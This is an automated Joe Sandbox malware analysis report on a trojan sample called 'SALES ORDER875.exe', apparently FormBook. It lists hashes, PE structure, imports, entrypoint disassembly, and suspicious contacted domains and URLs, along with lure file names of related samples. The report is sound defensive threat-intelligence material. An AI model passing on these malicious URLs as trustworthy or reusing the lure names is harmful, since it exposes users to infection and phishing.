http://www.iscinddocenaemlynne.cfd/ge07/www.zoc-marriage.xyz	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.ecurityemployment.todayReferer:	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.f7y2i9fgm.xyzReferer:	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.rkgexg.top/ge07/	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.iscinddocenaemlynne.cfdReferer:	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/Vh5j3k	explorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ocockbowerlybrawer.cfd/ge07/www.ool-covers76.xyz	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.lasterdeals.shop	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.9net88.net/ge07/www.yegle.net	explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
216.239.32.52	yegle.net	United States		15169	GOOGLEUS	false
199.59.243.227	94950.bodis.com	United States		395082	BODIS-NJUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546714
Start date and time:	2024-11-01 14:06:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SALES ORDER875.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/1@10/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 45 Number of non-executed functions: 300
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: SALES ORDER875.exe

Simulations

Behavior and APIs

Time	Type	Description
09:07:55	API Interceptor	6947095x Sleep call for process: netsh.exe modified
09:07:59	API Interceptor	8066285x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
199.59.243.227	draft contract for order #782334.exe	Get hash	malicious	FormBook	Browse	www.deepfy.xyz/t7p4/
	VkTNb6p288.exe	Get hash	malicious	FormBook	Browse	www.662-home-nb.shop/90v4/
	NF_Payment_Ref_FAN930276.exe	Get hash	malicious	FormBook	Browse	www.rebel.tienda/7n9v/
	SWIFT.exe	Get hash	malicious	FormBook	Browse	www.migraine-massages.pro/ym43/?1Do0qp=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRaIpZZY1Y+O2jmybRXdJyK6xs6rkJOg==&yNNX=snRp
	#10302024.exe	Get hash	malicious	FormBook	Browse	www.migraine-massages.pro/ym43/
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	www.rebel.tienda/7n9v/
	WARUNKI UMOWY-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.allforai.xyz/puo4/
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	www.297676.com/xyex/
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	www.297676.com/xyex/
	HSBC Payment Advice.exe	Get hash	malicious	FormBook	Browse	www.dating-apps-il-dn5.xyz/u67c/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94950.bodis.com	Invoice & Packing list For Sea Shipment.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Invoice Packing list For Sea Shipment.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Invoice Packing list For Sea Shipment.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	OVERDUE BALANCE.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	PO23100072.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	PO-000001488.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Enquiry.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Amended Proforma #U2013 SMWD5043.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	RECIEPT.PDF.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	LgzpILNkS2.exe	Get hash	malicious	FormBook	Browse	199.59.243.226

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BODIS-NJUS	draft contract for order #782334.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	VkTNb6p288.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	NF_Payment_Ref_FAN930276.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	SWIFT.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	#10302024.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	WARUNKI UMOWY-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.227
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	HSBC Payment Advice.exe	Get hash	malicious	FormBook	Browse	199.59.243.227

Process:	C:\Users\user\Desktop\SALES ORDER875.exe
File Type:	data
Category:	dropped
Size (bytes):	189440
Entropy (8bit):	7.8380796830184165
Encrypted:	false
SSDEEP:	3072:6HK9oP36tyB28poN3tZyJ/EfZVz7bN9Dwhg2Ywc/oe1a0V0OaTJ1Ck1lkW8qpRnm:67qY28lJ/WV3NSgd58J/lV8ID10h
MD5:	9BC54AB9410B586B68EDDBA852C637CC
SHA1:	FC696BCD08A2A4BA1CA9BA906B3E1C859CB7B48A
SHA-256:	03B8B21588D8040D3DBF8F35045A3E79CD8CFB8FC3FE48AC2ABB5B490CCDC557
SHA-512:	1D667CF24784FAE219EBFB204D985FC8E7395295D10F2F059740E5A303D4B39C5218692C9225F85909B3AD0809B3EF56AF527F581E4C69BC275F6FEC945F8A17
Malicious:	false
Reputation:	low
Preview:	..u..7A0T...8......V3...i3\...1M4V59BV0BR7A0TNZ51M4V59BV0BR7.0TNT*.C4.<.c.1....X==zEC"S$TTb5Q,<X5.6+zGD#.?[...cb?X%UzCW?.M4V59BV..Z..2...W...S..V....'..N....R..9....4..Y7&..W.4V59BV0BR7A0TNZ5a.4Vy8CV.;fA0TNZ51M.V78IW:BR.C0TNZ51M4VE.CV0RR7A.VNZ5qM4F59BT0BW7@0TNZ54M5V59BV0.P7A2TNZ51M6Vu.BV BR'A0TNJ51]4V59BV BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0z:?MEM4V..@V0RR7A.VNZ%1M4V59BV0BR7A0tNZU1M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TNZ51M4V59BV0BR7A0TN

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.27582303400322
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SALES ORDER875.exe
File size:	1'396'736 bytes
MD5:	6ac24df0d8b58005679910e42981dbe8
SHA1:	e421e5241a965e8714d3506dfb0aabc06ee52603
SHA256:	eb00047a6b0c3483760d36fc53b69398768f28532003f44d0b402052f65bbd24
SHA512:	6181b4ef3b6850c3fb60bfab6637e0fe80fd13fd14e2c56c8fd4cb25f633950d5c38262566ec3a77563a0aa17c4e5ffee78fe6962992175a5938a275c5488259
SSDEEP:	24576:MqDEvCTbMWu7rQYlBQcBiT6rprG8a8tqTr5mBln/sKG4K5nwqsPGAAJBl7:MTvC/MTQYxsWR7a8tqhmDn64K5sAV
TLSH:	B855D00273C1D062FF9B92334B5AF6515BBC6A260123E61F13981D7ABE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x672420CF [Fri Nov 1 00:29:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FC62882BCF3h
jmp 00007FC62882B5FFh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FC62882B7DDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FC62882B7AAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FC62882E39Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FC62882E3E8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FC62882E3D1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x7e558	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x153000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x7e558	0x7e600	aab91196a818d85026b1eef86242a428	False	0.9496572854846687	data	7.940026149060241	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x153000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd44a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd45c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd48b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd49d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5880	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd6690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8c38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xd9ce0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_STRING	0xda148	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xda6dc	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdad68	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb1f8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdb7f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdbe50	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc2b8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc410	0x75bf0	data			1.0003234581826626
RT_GROUP_ICON	0x152000	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x152078	0x14	data	English	Great Britain	1.15
RT_VERSION	0x15208c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x152168	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
